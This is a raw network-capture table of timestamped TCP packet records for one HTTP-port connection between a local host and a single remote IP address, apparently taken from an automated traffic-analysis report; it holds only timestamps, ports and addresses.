Dec 24, 2023 10:44:28.486973047 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.486990929 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.487131119 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.487166882 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.487170935 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.487181902 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.487214088 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.487278938 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.487332106 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.487370968 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.487400055 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.487473011 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.487509966 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.487534046 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.487581968 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.487616062 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.487637043 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.487651110 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.487689972 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.487723112 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.487788916 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.487824917 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.487833977 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.487901926 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.487937927 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.487992048 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.488049984 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.488087893 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.488107920 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.488147020 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.488181114 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.488208055 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.488272905 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.488310099 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.488512993 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.488579988 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.488616943 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.488643885 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.488688946 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.488737106 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.488746881 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.488792896 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.488836050 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.488856077 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.488881111 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.488912106 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.488931894 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.488996983 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.489033937 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.489051104 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.489097118 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.489134073 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.489160061 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.489183903 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.489217043 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.489284039 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.489450932 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.489496946 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.489527941 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.489592075 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.489636898 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.489645958 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.489686966 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.489722013 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.489748001 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.489793062 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.489830017 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.489896059 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.489963055 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.490001917 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.490024090 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.490056992 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.490096092 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.490112066 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.490164042 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.490199089 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.490221977 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.490269899 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.490291119 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.490308046 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.490354061 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.490390062 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.490416050 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.490464926 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.490499973 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.490504980 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.490577936 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.490617990 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.490647078 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.490734100 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.490770102 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.490997076 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.491065025 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.491102934 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.491122007 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.491182089 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.491216898 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.491225004 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.491291046 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.491322041 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.491362095 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.491408110 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.491444111 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.491460085 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.491509914 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.491545916 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.491574049 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.491606951 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.491640091 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.491688013 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.491743088 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.491777897 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.491806984 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.491851091 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.491869926 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.491905928 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.491946936 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.491983891 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.492001057 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.492050886 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.492085934 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.492108107 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.492132902 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.492166996 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.492182016 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.492254019 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.492268085 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.492295027 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.492347002 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.492369890 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.492381096 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.492459059 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.492494106 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.492533922 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.492619038 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.492664099 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.492676020 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.492733955 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.492765903 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.492774010 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.492851973 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.492889881 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.492917061 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.492995977 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.493035078 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.493160963 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.493221045 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.493257999 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.493278980 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.493331909 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.493367910 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.493401051 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.493489981 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.493527889 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.493556023 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.493606091 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.493643999 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.493671894 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.493729115 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.493741989 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.493766069 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.493824959 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.493861914 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.493885040 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.493912935 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.493953943 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.494009972 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.494024992 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.494062901 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.494122982 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.494177103 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.494211912 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.494218111 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.494266033 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.494306087 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.494309902 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.494370937 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.494407892 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.494432926 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.494503975 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.494538069 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.494703054 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.494793892 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.494832039 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.494832993 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.494883060 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.494915962 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.494956017 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.495090008 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.495125055 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.495129108 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.495178938 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.495218992 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.495260954 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.495362043 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.495397091 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.495414972 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.495474100 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.495512009 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.495539904 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.495587111 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.495625019 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.495764017 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.495814085 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.495848894 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.495873928 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.495934963 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.495969057 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.495997906 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.496048927 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.496084929 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.496113062 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.496167898 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.496181965 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.496202946 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.496273041 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.496287107 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.496313095 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.496352911 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.496387959 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.496401072 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.496479034 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.496512890 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.496545076 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.496637106 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.496675014 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.496748924 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.496763945 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.496797085 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.496803045 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.496855021 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.496891975 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.496900082 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.497047901 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.497093916 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.497097015 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.497148991 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.497195005 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.497205973 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.497255087 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.497297049 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.497315884 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.497364044 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.497405052 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.497406006 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.497451067 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.497488976 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.497498035 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.497545958 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.497581005 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.497613907 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.497663975 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.497704983 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.497714996 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.497782946 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.497817039 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.497848034 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.497873068 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.497915030 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.497942924 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.497993946 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.498043060 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.498051882 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.498096943 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.498142004 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.498161077 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.498205900 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.498250961 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.498358011 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.498445034 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.498487949 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.498513937 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.498615980 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.498652935 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.498680115 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.498761892 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.498805046 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.498851061 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.498946905 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.498986006 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.499010086 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.499115944 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.499156952 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.499186039 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.499289036 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.499336958 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.499362946 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.499522924 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.499564886 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.499594927 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.499658108 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.499700069 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.499921083 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.499936104 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.499948025 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.499960899 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.499974012 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.499974966 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.499999046 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.500000954 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.500050068 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.500056028 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.500103951 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.500144005 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.500159025 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.500202894 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.500243902 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.500416040 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.500428915 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.500441074 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.500454903 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.500467062 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.500467062 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.500497103 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.500524044 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.500567913 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.500602007 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.500632048 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.500677109 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.500746965 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.500811100 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.500849962 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.500850916 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.500895023 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.500937939 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.501023054 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.501089096 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.501130104 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.501131058 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.501252890 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.501285076 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.501300097 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.501374006 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.501404047 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.501413107 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.501454115 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.501486063 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:28.501513004 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.501575947 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:28.501609087 CET	49716	80	192.168.2.5	91.215.85.17
